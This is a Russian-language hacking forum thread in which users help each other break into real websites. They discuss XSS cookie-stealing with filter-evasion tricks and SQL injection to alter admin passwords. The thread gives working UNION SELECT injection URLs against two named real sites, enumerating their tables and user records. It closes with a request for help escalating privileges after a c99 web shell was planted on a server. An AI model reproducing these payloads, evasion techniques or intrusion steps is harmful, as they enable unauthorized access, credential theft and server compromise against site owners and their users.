Все, что внутри String.fromCharCode() - это коды символов в гексальной системе. Алерт-то хоть выскакивает? =) Попробуй потренироваться на замене имеющейся картинке страницы типа Code: document.images(0).src = <путь к какой-нить картинке>; Если картинка поменялась, пробуй в src вставить код сниффера
конечно ))) И мои куки показывает, если попросить их через запрос вида Но на снифер не отправляет. Сайт на котором пытаюсь провернуть (PHP-Fusion 6.01.13) может в нем загвоздка?-так ведь алерт есть
А может в том, что ковычки фильтруются или пробелы? пробуй так: віжу у тя значь тока под ИЕ сойдёт, если другие кавычки не употреблять. НО теж говорили зачарить смволы: вместо пробелов /**/, на случай если они фильтруются или попробуй маниуляции с document.write(String.fromCharCode(ТУТ+ЗАЧАРИННЫЙ ВЕСЬ СКРИПТ))
Ковычки и правда фильтруются, запрос работает только такого вида: почему же только в ИЕ?-у меня на опере показывает пробелы пробовал заменять еще вчера-ничего не вышло -------------------------------------------------------------------- уже все(из посоветованого), перепробовал и ничего не работает. Могу только увидеть свои куки, но любые попытки отправить их на снифер, заканчиваются обломом За ответы, всем ОГРОМНОЕ спасибо, но они ни к чему так и не привели. --------------------------------------------------------------------
я о том что javascript:alert(`xss`) сработет в ІЕ, да и то не во всех версиях. Тут можно обойтись без кавычек, а выще, стукни мне в асю - 8-0-8-8-0-3-6 - помогу
2 Spaise Примерно так: update таблица set password='пароль или хеш' where login='логин юзера' Надеюсь понятно , что password и login это условно. Нужны твои столбцы
Такой запрос катит из PhpMyAdmin, в скуле нужно количество столбцов указывать, вот здесь и облом, ни чего обновить не получается.
нет. в мускуле в скл-иньекции нельзя при основном запросе если он изначально идет не update произвести апдейт ) то есть тут нельзя разделить запрос на подобие мсскл id=1;update blabla set blabla='xek' where blabla
Вопросик возник.. е. возможно ли через скуль багу, методом insert into сменить пароль админа из другой базы.? Зависит ли ето только от прав пользователя?
insert into - это добавление, а сменить это апдейт. Мой вопрос был по MySQL и он катит, но как blackybr сказал, только не в инжекте.
на одном сайте в исходниках страницы есть такая сторочка if(eregi("[^a-z0-9_-]",$_GET['f']) || eregi("[^a-z0-9_-]",$_GET['p'])){header ("Location: index.php?error&".SID); exit;} могу ли я использовать для записишела в php не силен сам предполагаю что нельзя хот яи не уверен
Никак нельзя, этот код просто проверяет по регулярным выражениям значения входящих переменных и в случае несоответствия шаблону выдаёт редирект, видимо, на страницу с ошибкой.
нашел название таблицы. а при подставновкке выдаёт ошибку. нашел вот так http://www.suas.ru/news/show.php?id=-1+union+select+1,table_name,3,4,5,table_schema,7,8,9,10+from+information_schema.tables+limit+41,1/* подставил сюда http://www.suas.ru/news/show.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10+from+ru_suas_reg_users/* и ошибка =\
В этой таблице нет ни одной записи просто, пустая она: http://www.suas.ru/news/show.php?id=-1+union+select+1,2,3,4,5,count(1),7,8,9,10%20from%20ru_suas_reg_users/*
Советую в дальнейшем не заниматься телепатией, а посмотреть на происходящие вещи, т.е. сначала посмотреть ссылки которые дали, а потом постить
http://www.laptopshowcase.co.uk/suppliers.php?id=-2+group+by+6+union+select+1,2,3,4,5,6,7,8,9+from+suppliers или products/* Чёт у мя тут не получается)).В таблицах Suppliers, Downloads, Products есть столбцы name и id. Вбиваю их,пишет Suppliers not found. Значит ли это, что их нету ?)). Другие столбцы перебирать не стал) http://www.laptopshowcase.co.uk/suppliers.php?id=-2+group+by+6+union+select+1,2,3,4,5,6,7,8,9/* P.S. Подставляя вместо 3 что-либо, пытаться угадать ? Если есть что...
Linux exploit Здравствуйте! я ламер, но получилось залить шелл c99madshell на сервер под Software: Apache/2.0.55 (Ubuntu) mod_ssl/2.0.55 OpenSSL/0.9.8a. PHP/5.1.2 Linux webserver2 2.6.15-26-server Нет доступа к файлам, у которых Owner root/adm Есть доступ к root/root и root/www-data Скажите, как получить к root/adm файлам доступ? Посоветуйте, где что почитать нужно по этой теме? Спасибо!
